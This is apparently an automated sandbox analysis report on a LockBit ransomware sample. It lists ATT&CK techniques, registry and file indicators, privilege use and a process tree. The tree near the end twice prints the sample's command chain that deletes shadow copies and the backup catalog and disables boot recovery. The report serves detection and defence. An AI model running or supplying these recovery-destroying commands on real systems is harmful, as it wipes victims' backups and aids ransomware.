lockbit | c5741701b3866459dd1ffa2477cfd8776713612912693a5897f78aac795d23e9

pid	Process
1984	bcdedit.exe
1976	bcdedit.exe
2336	bcdedit.exe
5080	bcdedit.exe
3000	bcdedit.exe
2624	bcdedit.exe
4460	bcdedit.exe
1652	bcdedit.exe

Renames multiple (6003) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Deletes System State backups 3 TTPs 4 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command and Scripting Interpreter

T1059

File Deletion

Inhibit System Recovery

pid	Process
5392	wbadmin.exe
4260	wbadmin.exe
5796	wbadmin.exe
3000	wbadmin.exe

Deletes backup catalog 3 TTPs 2 IoCs

Uses wbadmin.exe to inhibit system recovery.

ransomware

Command and Scripting Interpreter

T1059

File Deletion

Inhibit System Recovery

pid	Process
868	wbadmin.exe
4856	wbadmin.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-73851796-4078923053-1419757224-1000\Control Panel\International\Geo\Nation	LockBit_14_02_2021_146KB.exe
Key value queried	\REGISTRY\USER\S-1-5-21-73851796-4078923053-1419757224-1000\Control Panel\International\Geo\Nation	LockBit_14_02_2021_146KB.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-73851796-4078923053-1419757224-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XO1XADpO01 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\RansomwareSamples\\LockBit_14_02_2021_146KB.exe\""	LockBit_14_02_2021_146KB.exe

Enumerates connected drives 3 TTPs 2 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\F:	LockBit_14_02_2021_146KB.exe
File opened (read-only)	\??\F:	LockBit_14_02_2021_146KB.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs

pid	Process
3312	LockBit_14_02_2021_146KB.exe
3312	LockBit_14_02_2021_146KB.exe
3312	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
3312	LockBit_14_02_2021_146KB.exe
3312	LockBit_14_02_2021_146KB.exe
3312	LockBit_14_02_2021_146KB.exe
3312	LockBit_14_02_2021_146KB.exe
3312	LockBit_14_02_2021_146KB.exe
3312	LockBit_14_02_2021_146KB.exe
3312	LockBit_14_02_2021_146KB.exe
3312	LockBit_14_02_2021_146KB.exe
3312	LockBit_14_02_2021_146KB.exe
3312	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files\Microsoft Office\root\Office16\MSIPC\et\Restore-My-Files.txt	LockBit_14_02_2021_146KB.exe
File created	C:\Program Files\Windows Defender\es-ES\Restore-My-Files.txt	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\svgCheckboxUnselected.svg	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\rhp_world_icon_hover_2x.png	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\css\main-selector.css	LockBit_14_02_2021_146KB.exe
File created	C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\fr-FR\Restore-My-Files.txt	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_Retail-pl.xrm-ms	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\MondoR_O17EnterpriseVL_Bypass30-ppd.xrm-ms	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019R_Retail-ul-phn.xrm-ms	LockBit_14_02_2021_146KB.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-ae\Restore-My-Files.txt	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sl-si\ui-strings.js	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\fr-ma\ui-strings.js	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Green Yellow.xml	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\manifest.xml	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_radio_selected_18.svg	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription3-ppd.xrm-ms	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\hr-hr\ui-strings.js	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\scanAppLogo.png	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color48.png	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fr-ma\ui-strings.js	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\illustrations.png	LockBit_14_02_2021_146KB.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\Restore-My-Files.txt	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\compare_poster.jpg	LockBit_14_02_2021_146KB.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\sk-sk\Restore-My-Files.txt	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\SearchEmail.png	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Integration\C2RManifest.Word.Word.x-none.msi.16.x-none.xml	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProjectProCO365R_SubTrial-ul-oob.xrm-ms	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL107.XML	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Checkers.api	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Outlook2019R_OEM_Perp-ppd.xrm-ms	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\1033\ONENOTE_COL.HXC	LockBit_14_02_2021_146KB.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sk-sk\Restore-My-Files.txt	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-tw\ui-strings.js	LockBit_14_02_2021_146KB.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\en-il\Restore-My-Files.txt	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ta.txt	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PowerPointVL_KMS_Client-ppd.xrm-ms	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\skins\fonts\FreeSans.ttf	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\css\main.css	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon.png	LockBit_14_02_2021_146KB.exe
File created	C:\Program Files\Java\jre-1.8\legal\javafx\Restore-My-Files.txt	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\MTEXTRA.TTF	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\add-comment.png	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\zh-tw\ui-strings.js	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\vlc.mo	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\sv-se\ui-strings.js	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioProCO365R_Subscription-pl.xrm-ms	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_nothumbnail_34.svg	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\FPA_f7\FA000000007	LockBit_14_02_2021_146KB.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\zh-tw\Restore-My-Files.txt	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusE5R_Subscription-ppd.xrm-ms	LockBit_14_02_2021_146KB.exe
File created	C:\Program Files\Microsoft Office\root\Office16\MSIPC\sk\Restore-My-Files.txt	LockBit_14_02_2021_146KB.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\hu-hu\Restore-My-Files.txt	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\s_checkbox_selected_18.svg	LockBit_14_02_2021_146KB.exe
File created	C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\Restore-My-Files.txt	LockBit_14_02_2021_146KB.exe
File created	C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\Restore-My-Files.txt	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app-api\dev\app-api.js	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\security\blacklisted.certs	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\intf\dummy.luac	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\Windows Defender\de-DE\ProtectionManagement.mfl	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\illustrations.png	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files (x86)\Windows Media Player\it-IT\mpvis.dll.mui	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\7-Zip\Lang\eo.txt	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\deploy\messages_zh_TW.properties	LockBit_14_02_2021_146KB.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\br.gif	LockBit_14_02_2021_146KB.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.1.etl	wbadmin.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	LockBit_14_02_2021_146KB.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	LockBit_14_02_2021_146KB.exe

Checks SCSI registry key(s) 3 TTPs 4 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_WDC&PROD_WDS100T2B0A\4&215468A5&0&000000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName	vds.exe

Interacts with shadow copies 3 TTPs 4 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

Inhibit System Recovery

Direct Volume Access

T1006

pid	Process
1764	vssadmin.exe
4336	vssadmin.exe
3904	vssadmin.exe
5272	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 36 IoCs

pid	Process
3312	LockBit_14_02_2021_146KB.exe
3312	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
4700	WMIC.exe
4700	WMIC.exe
4700	WMIC.exe
4700	WMIC.exe
4796	WMIC.exe
4796	WMIC.exe
4796	WMIC.exe
4796	WMIC.exe
1252	WMIC.exe
1252	WMIC.exe
1252	WMIC.exe
1252	WMIC.exe
3204	WMIC.exe
3204	WMIC.exe
3204	WMIC.exe
3204	WMIC.exe
780	LockBit_14_02_2021_146KB.exe
3312	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
3312	LockBit_14_02_2021_146KB.exe
3312	LockBit_14_02_2021_146KB.exe
3312	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe
780	LockBit_14_02_2021_146KB.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeTakeOwnershipPrivilege	3312	LockBit_14_02_2021_146KB.exe
Token: SeDebugPrivilege	3312	LockBit_14_02_2021_146KB.exe
Token: SeTakeOwnershipPrivilege	780	LockBit_14_02_2021_146KB.exe
Token: SeDebugPrivilege	780	LockBit_14_02_2021_146KB.exe
Token: SeBackupPrivilege	2684	vssvc.exe
Token: SeRestorePrivilege	2684	vssvc.exe
Token: SeAuditPrivilege	2684	vssvc.exe
Token: SeIncreaseQuotaPrivilege	4700	WMIC.exe
Token: SeSecurityPrivilege	4700	WMIC.exe
Token: SeTakeOwnershipPrivilege	4700	WMIC.exe
Token: SeLoadDriverPrivilege	4700	WMIC.exe
Token: SeSystemProfilePrivilege	4700	WMIC.exe
Token: SeSystemtimePrivilege	4700	WMIC.exe
Token: SeProfSingleProcessPrivilege	4700	WMIC.exe
Token: SeIncBasePriorityPrivilege	4700	WMIC.exe
Token: SeCreatePagefilePrivilege	4700	WMIC.exe
Token: SeBackupPrivilege	4700	WMIC.exe
Token: SeRestorePrivilege	4700	WMIC.exe
Token: SeShutdownPrivilege	4700	WMIC.exe
Token: SeDebugPrivilege	4700	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4700	WMIC.exe
Token: SeRemoteShutdownPrivilege	4700	WMIC.exe
Token: SeUndockPrivilege	4700	WMIC.exe
Token: SeManageVolumePrivilege	4700	WMIC.exe
Token: 33	4700	WMIC.exe
Token: 34	4700	WMIC.exe
Token: 35	4700	WMIC.exe
Token: 36	4700	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4796	WMIC.exe
Token: SeSecurityPrivilege	4796	WMIC.exe
Token: SeTakeOwnershipPrivilege	4796	WMIC.exe
Token: SeLoadDriverPrivilege	4796	WMIC.exe
Token: SeSystemProfilePrivilege	4796	WMIC.exe
Token: SeSystemtimePrivilege	4796	WMIC.exe
Token: SeProfSingleProcessPrivilege	4796	WMIC.exe
Token: SeIncBasePriorityPrivilege	4796	WMIC.exe
Token: SeCreatePagefilePrivilege	4796	WMIC.exe
Token: SeBackupPrivilege	4796	WMIC.exe
Token: SeRestorePrivilege	4796	WMIC.exe
Token: SeShutdownPrivilege	4796	WMIC.exe
Token: SeDebugPrivilege	4796	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4796	WMIC.exe
Token: SeRemoteShutdownPrivilege	4796	WMIC.exe
Token: SeUndockPrivilege	4796	WMIC.exe
Token: SeManageVolumePrivilege	4796	WMIC.exe
Token: 33	4796	WMIC.exe
Token: 34	4796	WMIC.exe
Token: 35	4796	WMIC.exe
Token: 36	4796	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4700	WMIC.exe
Token: SeSecurityPrivilege	4700	WMIC.exe
Token: SeTakeOwnershipPrivilege	4700	WMIC.exe
Token: SeLoadDriverPrivilege	4700	WMIC.exe
Token: SeSystemProfilePrivilege	4700	WMIC.exe
Token: SeSystemtimePrivilege	4700	WMIC.exe
Token: SeProfSingleProcessPrivilege	4700	WMIC.exe
Token: SeIncBasePriorityPrivilege	4700	WMIC.exe
Token: SeCreatePagefilePrivilege	4700	WMIC.exe
Token: SeBackupPrivilege	4700	WMIC.exe
Token: SeRestorePrivilege	4700	WMIC.exe
Token: SeShutdownPrivilege	4700	WMIC.exe
Token: SeDebugPrivilege	4700	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4700	WMIC.exe
Token: SeRemoteShutdownPrivilege	4700	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4924 wrote to memory of 780	4924	cmd.exe	85
PID 4924 wrote to memory of 780	4924	cmd.exe	85
PID 4924 wrote to memory of 780	4924	cmd.exe	85
PID 3312 wrote to memory of 1152	3312	LockBit_14_02_2021_146KB.exe	87
PID 3312 wrote to memory of 1152	3312	LockBit_14_02_2021_146KB.exe	87
PID 780 wrote to memory of 968	780	LockBit_14_02_2021_146KB.exe	89
PID 780 wrote to memory of 968	780	LockBit_14_02_2021_146KB.exe	89
PID 1152 wrote to memory of 4336	1152	cmd.exe	91
PID 1152 wrote to memory of 4336	1152	cmd.exe	91
PID 968 wrote to memory of 1764	968	cmd.exe	92
PID 968 wrote to memory of 1764	968	cmd.exe	92
PID 1152 wrote to memory of 4700	1152	cmd.exe	145
PID 1152 wrote to memory of 4700	1152	cmd.exe	145
PID 968 wrote to memory of 4796	968	cmd.exe	96
PID 968 wrote to memory of 4796	968	cmd.exe	96
PID 968 wrote to memory of 1652	968	cmd.exe	98
PID 968 wrote to memory of 1652	968	cmd.exe	98
PID 1152 wrote to memory of 1984	1152	cmd.exe	99
PID 1152 wrote to memory of 1984	1152	cmd.exe	99
PID 968 wrote to memory of 1976	968	cmd.exe	100
PID 968 wrote to memory of 1976	968	cmd.exe	100
PID 1152 wrote to memory of 2336	1152	cmd.exe	101
PID 1152 wrote to memory of 2336	1152	cmd.exe	101
PID 968 wrote to memory of 4856	968	cmd.exe	102
PID 968 wrote to memory of 4856	968	cmd.exe	102
PID 1152 wrote to memory of 868	1152	cmd.exe	103
PID 1152 wrote to memory of 868	1152	cmd.exe	103
PID 780 wrote to memory of 2892	780	LockBit_14_02_2021_146KB.exe	106
PID 780 wrote to memory of 2892	780	LockBit_14_02_2021_146KB.exe	106
PID 780 wrote to memory of 3040	780	LockBit_14_02_2021_146KB.exe	108
PID 780 wrote to memory of 3040	780	LockBit_14_02_2021_146KB.exe	108
PID 780 wrote to memory of 4940	780	LockBit_14_02_2021_146KB.exe	111
PID 780 wrote to memory of 4940	780	LockBit_14_02_2021_146KB.exe	111
PID 780 wrote to memory of 472	780	LockBit_14_02_2021_146KB.exe	113
PID 780 wrote to memory of 472	780	LockBit_14_02_2021_146KB.exe	113
PID 780 wrote to memory of 3056	780	LockBit_14_02_2021_146KB.exe	116
PID 780 wrote to memory of 3056	780	LockBit_14_02_2021_146KB.exe	116
PID 2892 wrote to memory of 5272	2892	cmd.exe	118
PID 2892 wrote to memory of 5272	2892	cmd.exe	118
PID 3040 wrote to memory of 4460	3040	cmd.exe	119
PID 3040 wrote to memory of 4460	3040	cmd.exe	119
PID 3056 wrote to memory of 5392	3056	cmd.exe	120
PID 3056 wrote to memory of 5392	3056	cmd.exe	120
PID 4940 wrote to memory of 2624	4940	cmd.exe	121
PID 4940 wrote to memory of 2624	4940	cmd.exe	121
PID 472 wrote to memory of 3000	472	cmd.exe	122
PID 472 wrote to memory of 3000	472	cmd.exe	122
PID 780 wrote to memory of 5340	780	LockBit_14_02_2021_146KB.exe	123
PID 780 wrote to memory of 5340	780	LockBit_14_02_2021_146KB.exe	123
PID 5340 wrote to memory of 1252	5340	cmd.exe	125
PID 5340 wrote to memory of 1252	5340	cmd.exe	125
PID 780 wrote to memory of 3020	780	LockBit_14_02_2021_146KB.exe	147
PID 780 wrote to memory of 3020	780	LockBit_14_02_2021_146KB.exe	147
PID 780 wrote to memory of 4792	780	LockBit_14_02_2021_146KB.exe	128
PID 780 wrote to memory of 4792	780	LockBit_14_02_2021_146KB.exe	128
PID 780 wrote to memory of 2512	780	LockBit_14_02_2021_146KB.exe	130
PID 780 wrote to memory of 2512	780	LockBit_14_02_2021_146KB.exe	130
PID 3020 wrote to memory of 3636	3020	cmd.exe	132
PID 3020 wrote to memory of 3636	3020	cmd.exe	132
PID 4792 wrote to memory of 1560	4792	cmd.exe	133
PID 4792 wrote to memory of 1560	4792	cmd.exe	133
PID 2512 wrote to memory of 4968	2512	cmd.exe	134
PID 2512 wrote to memory of 4968	2512	cmd.exe	134
PID 780 wrote to memory of 1852	780	LockBit_14_02_2021_146KB.exe	135

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe
"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"
1⤵
- Checks computer location settings
- Adds Run key to start application
- Enumerates connected drives
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3312
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1152
- - C:\Windows\system32\vssadmin.exe
    vssadmin delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:4336
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic shadowcopy delete
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4700
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:1984
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} recoveryenabled no
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:2336
- - C:\Windows\system32\wbadmin.exe
    wbadmin delete catalog -quiet
    3⤵
    - Deletes backup catalog
    PID:868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4924
- C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe
  C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\LockBit_14_02_2021_146KB.exe
  2⤵
  - Checks computer location settings
  - Enumerates connected drives
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:780
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:968
  - - C:\Windows\system32\vssadmin.exe
      vssadmin delete shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:1764
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic shadowcopy delete
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4796
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} bootstatuspolicy ignoreallfailures
      4⤵
      Modifies boot configuration data using bcdedit
      PID:1652
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} recoveryenabled no
      4⤵
      Modifies boot configuration data using bcdedit
      PID:1976
  - - C:\Windows\system32\wbadmin.exe
      wbadmin delete catalog -quiet
      4⤵
      Deletes backup catalog
      PID:4856
